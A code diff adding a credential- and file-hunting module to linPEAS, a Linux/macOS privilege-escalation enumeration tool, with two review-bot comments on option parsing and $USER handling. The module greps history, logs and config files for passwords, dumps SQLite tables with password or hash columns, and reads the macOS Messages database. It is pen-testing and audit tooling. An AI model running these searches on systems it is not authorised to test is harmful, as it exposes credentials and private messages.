diff --git a/linPEAS/builder/linpeas_parts/9_interesting_files.sh b/linPEAS/builder/linpeas_parts/9_interesting_files.sh
new file mode 100644
index 0000000..a6e19f3
--- /dev/null
+++ b/linPEAS/builder/linpeas_parts/9_interesting_files.sh
@@ -0,0 +1,315 @@ +########################################### +#----------) Interesting files (----------# +########################################### + + +##-- IF) .sh files in PATH +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title ".sh files in path" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path" + echo $PATH | tr ":" "\n" | while read d; do + for f in $(find "$d" -name "*.sh" -o -name "*.sh.*" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; + fi + done + done + echo "" + + broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken) + if [ "$broken_links" ] || [ "$DEBUG" ]; then + print_2title "Broken links in path" + echo $PATH | tr ":" "\n" | while read d; do + find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; + done + echo "" + fi +fi + +##-- IF) Date times inside firmware +if [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Files datetimes inside the firmware (limit 50)" + find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50 + echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"\"" + echo "" +fi + +##-- IF) Executable files added by user +print_2title "Executable files potentially added by user (limit 70)" +if ! 
[ "$SEARCH_IN_FOLDER" ]; then + find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head -n 70 +else + find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head -n 70 +fi +echo "" + + + +if [ "$MACPEAS" ]; then + print_2title "Unsigned Applications" + macosNotSigned /System/Applications +fi + +##-- IF) Unexpected in /opt +if ! [ "$SEARCH_IN_FOLDER" ]; then + if [ "$(ls /opt 2>/dev/null)" ]; then + print_2title "Unexpected in /opt (usually empty)" + ls -la /opt + echo "" + fi +fi + +##-- IF) Unexpected folders in / +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Unexpected in root" + if [ "$MACPEAS" ]; then + (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found + else + (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found + fi + echo "" +fi + +##-- IF) Modified interesting files into specific folders in the last 5mins +print_2title "Modified interesting files in the last 5mins (limit 100)" +find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! 
-path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," +echo "" + +##-- IF) Writable log files +if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below +print_2title "Writable log files (logrotten) (limit 50)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation" + logrotate --version 2>/dev/null || echo_not_found "logrotate" + lastWlogFolder="ImPOsSiBleeElastWlogFolder" + logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50) + printf "%s\n" "$logfind" | while read log; do + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + fi + fi + done +fi + +echo "" + +if ! 
[ "$SEARCH_IN_FOLDER" ]; then + ##-- IF) Files inside my home + print_2title "Files inside $HOME (limit 20)" + (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found + echo "" + + ##-- IF) Files inside /home + print_2title "Files inside others home (limit 20)" + (find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found + echo "" + + ##-- IF) Mail applications + print_2title "Searching installed mail applications" + ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" | sort | uniq + echo "" + + ##-- IF) Mails + print_2title "Mails (limit 50)" + (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found + echo "" + + ##-- IF) Backup folders + if [ "$backup_folders" ] || [ "$DEBUG" ]; then + print_2title "Backup folders" + printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; + ls -l "$b" 2>/dev/null && echo "" + done + echo "" + fi +fi + +##-- IF) Backup files +print_2title "Backup files (limited 100)" +backs=$(find $ROOT_FOLDER -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) +printf "%s\n" "$backs" | head -n 100 | while read b ; do + if [ -r "$b" ]; then + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; + fi; +done +echo "" + +##-- IF) DB files +if [ "$MACPEAS" ]; then + print_2title "Reading messages database" + sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from 
attachment' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null + +fi + + +if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then + print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" + FILECMD="$(command -v file 2>/dev/null)" + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if [ "$FILECMD" ]; then + echo "Found "$(file "$f") | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + else + echo "Found $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + fi + done + SQLITEPYTHON="" + echo "" + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + if [ "$(command -v sqlite3 2>/dev/null)" ]; then + tables=$(sqlite3 $f ".tables" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then + SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) + tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + else + tables="" + fi + if [ "$tables" ] || [ "$DEBUG" ]; then + printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC + printf "%s\n" "$tables" | while read t; do + columns="" + # Search for credentials inside the table using sqlite3 + if [ -z "$SQLITEPYTHON" ]; then + columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") + # Search for credentials inside the table using python + else + columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM 
sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) + fi + #Check found columns for interesting fields + INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") + if [ "$INTCOLUMN" ]; then + printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" + (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + echo "" + fi + done + fi + fi + done +fi +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Downloaded Files" + sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" +fi + +##-- IF) Web files +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Web files?(output limit)" + ls -alhR /var/www/ 2>/dev/null | head + ls -alhR /srv/www/htdocs/ 2>/dev/null | head + ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head + ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head + echo "" +fi + +##-- IF) All hidden files +print_2title "All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" +find $ROOT_FOLDER -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme|\.travis.yml" | head -n 70 +echo "" + +##-- IF) Readable files in /tmp, /var/tmp, backups +if ! 
[ "$SEARCH_IN_FOLDER" ]; then + print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" + filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | grep -Ev "dpkg\.statoverride\.|dpkg\.status\.|apt\.extended_states\.|dpkg\.diversions\." | head -n 70) + printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done + echo "" +fi + +##-- IF) Passwords in history cmd +if [ "$(history 2>/dev/null)" ] || [ "$DEBUG" ]; then + print_2title "Searching passwords in history cmd" + history | grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED}," + echo "" +fi + +##-- IF) Passwords in history files +if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then + print_2title "Searching passwords in history files" + printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done + echo "" +fi + +##-- IF) Passwords in config PHP files +if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then + print_2title "Searching passwords in config PHP files" + printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done + echo "" +fi + +##-- IF) Passwords files in home +if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then + print_2title "Searching *password* or *credential* files in home (limit 70)" + (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more 
creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found + echo "" +fi + +##-- IF) TTY passwords +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Checking for TTY (sudo/su) passwords in audit logs" + aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" + find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" + echo "" +fi + +##-- IF) IPs inside logs +if [ "$DEBUG" ] || ( ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$SEARCH_IN_FOLDER" ] ); then + print_2title "Searching IPs inside logs (limit 70)" + (find /var/log/ /var/logs /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 + echo "" +fi + +##-- IF) Passwords inside logs +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Searching passwords inside logs (limit 70)" + (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|modules-config/config-set-passwords\|config-set-passwords already ran\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," + echo "" +fi + +if [ "$DEBUG" ] || ( ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! 
[ "$SEARCH_IN_FOLDER" ] ); then + ##-- IF) Emails inside logs + print_2title "Searching emails inside logs (limit 70)" + (find /var/log/ /var/logs/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Find possible files with passwords + print_2title "Searching possible password variables inside key folders (limit 140)" + if ! [ "$SEARCH_IN_FOLDER" ]; then + timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} 
"s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + else + timeout 150 find $SEARCH_IN_FOLDER -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + fi + wait + echo "" + + ##-- IF) Find possible conf files with passwords + print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)" + if ! 
[ "$SEARCH_IN_FOLDER" ]; then + ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + else + ppicf=$(timeout 150 find $SEARCH_IN_FOLDER -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + fi + printf "%s\n" "$ppicf" | while read f; do + if grep -qEiI 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' \"$f\" 2>/dev/null; then + echo "$ITALIC $f$NC" + grep -HnEiIo 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" + fi + done + echo "" +fi diff --git a/linPEAS/builder/linpeas_parts/linpeas_base.sh b/linPEAS/builder/linpeas_parts/linpeas_base.sh index 1d483be..c498f5f 100755 --- a/linPEAS/builder/linpeas_parts/linpeas_base.sh +++ b/linPEAS/builder/linpeas_parts/linpeas_base.sh @@ -26,6 +26,7 @@ GREEN="${C}[1;32m" SED_GREEN="${C}[1;32m&${C}[0m" YELLOW="${C}[1;33m" SED_YELLOW="${C}[1;33m&${C}[0m" +RED_YELLOW="${C}[1;31;103m" SED_RED_YELLOW="${C}[1;31;103m&${C}[0m" BLUE="${C}[1;34m" SED_BLUE="${C}[1;34m&${C}[0m" 
@@ -88,8 +89,8 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW} -i [-p ]${BLUE} Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead.$DG Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 $GREEN Notice${BLUE} that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed - ${GREEN} Port forwarding: - ${YELLOW} -F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT${BLUE} Execute linpeas to forward a port from a local IP to a remote IP + ${GREEN} Port forwarding (reverse connection): + ${YELLOW} -F LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT${BLUE} Execute linpeas to forward a port from a your host (LOCAL_IP:LOCAL_PORT) to a remote IP (REMOTE_IP:REMOTE_PORT) ${GREEN} Firmware recon: ${YELLOW} -f ${BLUE} Execute linpeas to search passwords/file permissions misconfigs inside a folder @@ -118,16 +119,16 @@ while getopts "h?asd:p:i:P:qo:LMwNDterf:F:" opt; do w) WAIT=1;; N) NOCOLOR="1";; D) DEBUG="1";; - t) AUTO_NETWORK_SCAN="1";; + t) AUTO_NETWORK_SCAN="1"; CHECKS="network_information";; e) EXTRA_CHECKS="1";; r) REGEXES="1";; f) SEARCH_IN_FOLDER=$OPTARG; if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then #Make sure firmware folder ends with "/" - SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/"; - fi; - ROOT_FOLDER=$SEARCH_IN_FOLDER; - REGEXES="1"; - CHECKS="procs_crons_timers_srvcs_sockets,software_information,interesting_files,api_keys_regex";; + SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/"; + fi; + ROOT_FOLDER=$SEARCH_IN_FOLDER; + REGEXES="1"; + CHECKS="procs_crons_timers_srvcs_sockets,software_information,interesting_perms_files,interesting_files,api_keys_regex";; F) PORT_FORWARD=$OPTARG;; esac 
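Review bot: `t) AUTO_NETWORK_SCAN="1"; CHECKS="network_information";;` makes the selected checks depend on option order: `-o foo -t` silently discards the `-o` selection while `-t -o foo` keeps it. Deciding this after the `getopts` loop (set `CHECKS` to `network_information` only when `-o` was not given, e.g. by recording a flag in the `o)` case) keeps both spellings predictable. The `-f` branch still lists `api_keys_regex` in `CHECKS` while this commit deletes `linPEAS/builder/linpeas_parts/9_api_keys_regex.sh`; if no other part file provides that check, `-f` now requests a check that does not exist. The `getopts` loop begins before this hunk.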
@@ -453,7 +454,9 @@ else
 nosh_usrs=$(cat /etc/passwd 2>/dev/null | grep -i -v "sh$" | sort | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/')"ImPoSSssSiBlEee"
 fi
 knw_usrs='_amavisd|_analyticsd|_appinstalld|_appleevents|_applepay|_appowner|_appserver|_appstore|_ard|_assetcache|_astris|_atsserver|_avbdeviced|_calendar|_captiveagent|_ces|_clamav|_cmiodalassistants|_coreaudiod|_coremediaiod|_coreml|_ctkd|_cvmsroot|_cvs|_cyrus|_datadetectors|_demod|_devdocs|_devicemgr|_diskimagesiod|_displaypolicyd|_distnote|_dovecot|_dovenull|_dpaudio|_driverkit|_eppc|_findmydevice|_fpsd|_ftp|_fud|_gamecontrollerd|_geod|_hidd|_iconservices|_installassistant|_installcoordinationd|_installer|_jabber|_kadmin_admin|_kadmin_changepw|_knowledgegraphd|_krb_anonymous|_krb_changepw|_krb_kadmin|_krb_kerberos|_krb_krbtgt|_krbfast|_krbtgt|_launchservicesd|_lda|_locationd|_logd|_lp|_mailman|_mbsetupuser|_mcxalr|_mdnsresponder|_mobileasset|_mysql|_nearbyd|_netbios|_netstatistics|_networkd|_nsurlsessiond|_nsurlstoraged|_oahd|_ondemand|_postfix|_postgres|_qtss|_reportmemoryexception|_rmd|_sandbox|_screensaver|_scsd|_securityagent|_softwareupdate|_spotlight|_sshd|_svn|_taskgated|_teamsserver|_timed|_timezone|_tokend|_trustd|_trustevaluationagent|_unknown|_update_sharing|_usbmuxd|_uucp|_warmd|_webauthserver|_windowserver|_www|_wwwproxy|_xserverdocs|daemon\W|^daemon$|message\+|syslog|www|www-data|mail|noboby|Debian\-\+|rtkit|systemd\+'
-USER=$(whoami 2>/dev/null || echo "UserUnknown")
+if ! [ "$USER" ]; then
+ USER=$(whoami 2>/dev/null || echo -n "UserUnknown")
+fi
 if [ ! "$HOME" ]; then
 if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home
 else HOME="/home/$USER";
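Review bot: `echo -n` in the new fallback `USER=$(whoami 2>/dev/null || echo -n "UserUnknown")` is redundant and non-portable: command substitution already strips the trailing newline, and on `sh` implementations whose `echo` does not understand `-n` the user name would become `-n UserUnknown`; `printf 'UserUnknown'` (or the previous plain `echo`) avoids both. The guard also makes an inherited `$USER` win over `whoami`, and that environment value is later spliced unquoted into patterns such as `sed "s,$USER,${SED_RED},g"` and `grep -v -i "/"$USER` in the new interesting-files part, so a value containing `,`, spaces or regex metacharacters breaks those pipelines; either keep `whoami` as the primary source and use `$USER` only as the fallback, or validate the inherited value (e.g. against `^[A-Za-z0-9._-]+$`) before trusting it. The surrounding variable setup continues outside the hunk.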
@@ -466,7 +469,7 @@ peass{VARIABLES} pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID" 
